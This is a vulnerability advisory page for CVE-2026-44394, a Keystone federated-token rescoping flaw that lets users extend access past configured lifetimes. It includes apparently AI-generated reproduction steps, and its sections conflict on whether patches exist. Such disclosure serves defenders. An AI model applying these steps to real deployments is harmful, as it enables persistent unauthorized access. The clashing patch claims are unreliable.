CVE-2026-44394
Description
An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin returns response data without an expires_at value. The token provider falls back to issuing a token with a fresh default TTL. By rescoping repeatedly before each token expires, a user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This is a variant of CVE-2012-3426. Only deployments using federated identity (SAML2, OpenID Connect) are affected.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenStack Keystone federated token rescoping fails to propagate original token expiry, allowing federated users to bypass TTL policies and maintain access indefinitely.
Vulnerability
An authentication expiry bypass vulnerability exists in OpenStack Keystone's federated token rescoping mechanism (a variant of CVE-2012-3426). In keystone/auth/plugins/mapped.py, the handle_scoped_token() function constructs the response data but omits the expires_at attribute. When a federated user rescopes a token via POST /v3/auth/tokens, the token provider falls back to default_expire_time() instead of inheriting the original token's remaining lifetime, issuing a token with a fresh default TTL (typically 3600 seconds) [1]. This affects Keystone versions >=14.0.0 <27.0.2, >=28.0.0 <28.0.2, and >=29.0.0 <29.0.2. Only deployments using federated identity (SAML2, OpenID Connect) are vulnerable [2].
Exploitation
An attacker with a valid federated token can repeatedly call POST /v3/auth/tokens to rescope the token before it expires. Each successful rescope returns a new token with a full default TTL, as the original token's expires_at is not propagated [1]. No additional authentication or special privileges are required beyond possession of a valid federated token. The attacker can chain rescopes indefinitely to maintain continuous access.
Impact
By repeatedly rescoping, a federated user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This allows persistent access even after the user's account has been disabled at the upstream Identity Provider [1][2]. The impact is a breach of authentication policy enforcement, potentially leading to prolonged unauthorized access to Keystone-protected resources.
Mitigation
Upgrade to Keystone version 27.0.2, 28.0.2, or 29.0.2 (or later) as these releases include fixes that propagate the original token's expires_at during federated rescoping [2]. Patch reviews are available at the links provided in the advisory [2]. No workarounds have been disclosed for this vulnerability.
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing propagation of the original token's expires_at value in the federated token rescoping code path causes newly issued tokens to receive a fresh default TTL instead of inheriting the remaining lifetime."
Attack vector
An attacker with a valid federated token (obtained via SAML2 or OpenID Connect) sends a POST /v3/auth/tokens request with method=token and a project scope to rescope the token. Because the handle_scoped_token() function in keystone/auth/plugins/mapped.py omits the expires_at field from the response data [ref_id=1], the token provider falls back to default_expire_time() and issues a token with a fresh TTL. By repeating this rescoping operation before each token expires, the attacker can maintain access indefinitely, bypassing operator-configured token lifetime policies [CWE-613].
Affected code
The vulnerability is in keystone/auth/plugins/mapped.py, specifically the handle_scoped_token() function (lines 72-114), which constructs response data without including an expires_at attribute [ref_id=1]. The non-federated counterpart in keystone/auth/plugins/token.py (line 136) correctly preserves the original token's expiry via response_data.setdefault('expires_at', token.expires_at). The fallback logic in keystone/token/provider.py (lines 322-325) then defaults to a fresh expiration because the auth context lacks an explicit expiry [ref_id=1].
What the fix does
The advisory states that no patch has been published for this vulnerability [ref_id=1]. The recommended remediation is to propagate the original token's expires_at value in the federated rescoping code path, mirroring the fix already applied to the non-federated path in keystone/auth/plugins/token.py where response_data.setdefault('expires_at', token.expires_at) is called. Until a patch is available, operators should use short-lived token TTLs as a mitigation and monitor for repeated rescoping activity.
Preconditions
- configOpenStack Keystone must be deployed with federated identity enabled (auth methods include 'mapped')
- authAttacker must possess a valid federated token obtained via an upstream SAML2 or OpenID Connect Identity Provider
- configallow_rescope_scoped_token must be set to true (the default)
- networkNetwork access to the Keystone API endpoint (POST /v3/auth/tokens)
Reproduction
1. Obtain a federated unscoped token via GET /v3/OS-FEDERATION/identity_providers/{idp}/protocols/mapped/auth. 2. Rescope the token to a project via POST /v3/auth/tokens with method=token and scope=project. 3. Observe the rescoped token receives a fresh TTL instead of inheriting the original token's expiry. 4. Repeat rescoping before expiry to extend access indefinitely [ref_id=1].
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.